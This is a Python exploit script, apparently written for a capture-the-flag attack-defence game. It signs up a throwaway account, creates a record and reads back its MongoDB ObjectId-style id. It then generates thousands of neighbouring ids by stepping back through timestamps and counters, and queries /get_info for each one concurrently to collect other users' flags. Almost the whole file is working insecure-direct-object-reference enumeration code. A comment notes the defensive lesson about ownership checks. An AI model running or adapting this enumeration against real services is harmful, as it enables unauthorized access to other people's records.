#!/Library/Frameworks/Python.framework/Versions/3.8/bin/python3
#made by fargate
#FARGATETOP
from user_agent import generate_user_agent
import requests as rq
import random
import string
import re
import json
import sys
import grequests
# Target base URL, CSRF-token pattern and an (unused by default) local proxy.
# Tracebacks are suppressed so a failure prints only the exception message.
url = "http://" + "6.6.7.2" + ":31337"
# Captures the value attribute of the hidden CSRF input on the signup form.
crrfRegEx = r"hidden\" value=\"([\w\.\-]+)"
proxies = dict(http="http://127.0.0.1:8080")
sys.tracebacklimit = 0
def do_something(response, *args, **kwargs):
    """Response hook: print every flag-shaped token found in a JSON reply.

    Only bodies that mention "result" are parsed; the body is then decoded as
    JSON and ``result.Flag`` is scanned for tokens made of 21 upper-case
    alphanumerics, 10 upper-case hex digits and a trailing "=". The extra
    positional/keyword arguments come from the requests hook protocol and are
    ignored. Raises ValueError/KeyError when the body is not the expected JSON.
    """
    body = response.text
    if "result" not in body:
        return
    payload = json.loads(body)
    hits = re.findall(r"[A-Z0-9]{21}[A-F0-9]{10}=", payload["result"]["Flag"])
    for hit in hits:
        print(hit, flush=True)
def getrandom(N):
    """Return a string of ``N`` characters drawn from the ASCII letters.

    Uses ``random`` rather than ``secrets``, so the output is not suitable for
    anything security-sensitive; here it only serves as throwaway form data.
    """
    return "".join(random.choice(string.ascii_letters) for _ in range(N))
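def signup():
    """Register a throwaway account and return the session plus credentials.

    Fetches the signup form, extracts the CSRF token with ``crrfRegEx`` and
    posts a form whose first/last name, username and password are all the
    same random string.

    Returns:
        ``(session, user, password, csrf_token)``.

    Raises:
        SystemExit: with status 0 when no CSRF token is found in the form
            (matches the original behaviour). Only that lookup failure is
            caught; network and HTTP errors now propagate instead of being
            swallowed by a bare ``except``.
    """
    s = rq.Session()
    # s.proxies = proxies  # uncomment to route through the local proxy
    s.headers["User-Agent"] = "python-requests/2.20.1"
    s.headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
    s.headers["Accept-Language"] = "en-US,en;q=0.5"
    s.headers["Accept-Encoding"] = "gzip, deflate"
    s.headers["Content-Type"] = "application/x-www-form-urlencoded"
    user = getrandom(10)
    password = user
    res = s.get(url + "/signup").text
    # No match means the page did not render the form we expect; stop quietly.
    try:
        resCSRF = re.findall(crrfRegEx, res)[0]
    except IndexError:
        sys.exit(0)
    burp0_data = {
        "firstname": user,
        "lastname": user,
        "username": user,
        "password": user,
        "email": getrandom(10) + "@" + getrandom(5) + "." + getrandom(2),
        "csrf_token": resCSRF,
        "submit": "Sign Up",
    }
    # The response body is irrelevant; only the session state matters.
    s.post(url + "/signup", data=burp0_data, allow_redirects=False)
    return s, user, password, resCSRF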
def singin(s, user, password, resCSRF, allow=False):
    """Log session ``s`` in by posting the credentials and CSRF token to /signin.

    ``allow`` is passed through as ``allow_redirects``. Nothing is returned;
    the effect of interest is the authenticated state left on ``s``.
    """
    form = {
        "username": user,
        "password": password,
        "csrf_token": resCSRF,
        "submit": "Sign In",
    }
    s.post(url + "/signin", data=form, allow_redirects=allow)
def main():
    """Register, log in, create a task and then query neighbouring record ids.

    The id returned by /project_selection is a 24-hex-character value that is
    split into four fields (8 + 6 + 4 + 6 chars); judging by the variable
    names these are the timestamp, machine id, process id and counter of a
    MongoDB ObjectId-style identifier — not confirmed here. Only the timestamp
    and counter are varied, so ids of records created around the same time
    are enumerable. The defensive takeaway: an endpoint such as /get_info must
    enforce ownership/authorization on the id rather than rely on the id
    being unguessable.
    """
    s, user, password, resCSRF = signup()
    singin(s, user, password, resCSRF)
    res = s.get(url + "/task_viewer").text
    # First 24-character task id rendered on the page; IndexError if none.
    resFind = re.findall(r"item\" id=\"(\w{24})\"", res)
    tmpId = resFind[0]
    zzzz = getrandom(6)
    burp0_data = {"id": tmpId, "Name": zzzz, "Description": "sdf", "Flag": "sdf", "Category": "Web", "Category_full": "Web", "Project": zzzz}
    res3 = s.get(url + "/project_selection?project=" + zzzz).text
    res2 = s.post(url + "/save_task", data=burp0_data).text
    # Re-query after saving so the new record's id is present.
    res3 = s.get(url + "/project_selection?project=" + zzzz).text
    _id = json.loads(res3)["result"][0]["_id"]
    # Split the 24-char id into its hex fields: 8 + 6 + 4 + 6 characters.
    timeUnix, machineId, IdProcess, Counter = _id[:8], _id[8:14], _id[14:18], _id[18:24]
    timeUnix = int(timeUnix, 16)
    Counter = int(Counter, 16)
    urls = []
    # 180 seconds back in time x 100 counter values back, machine/process
    # fields fixed. Note that `tmpId` here shadows the page id read above.
    for sec in range(timeUnix, timeUnix - 180, -1):
        for tmpId in range(Counter, Counter - 100, -1):
            idInfo = hex(sec)[2:] + machineId + IdProcess + hex(tmpId)[2:]
            tmpUrl = url + "/get_info?id={}".format(idInfo)
            urls.append(tmpUrl)
    # Requests are issued concurrently; do_something prints any flag found.
    # The returned list of responses is not used.
    rs = (grequests.get(u, hooks = {'response' : do_something}) for u in urls)
    resMap = grequests.map(rs)
# Script entry point: run only when executed directly, not on import.
if __name__ == "__main__":
    main()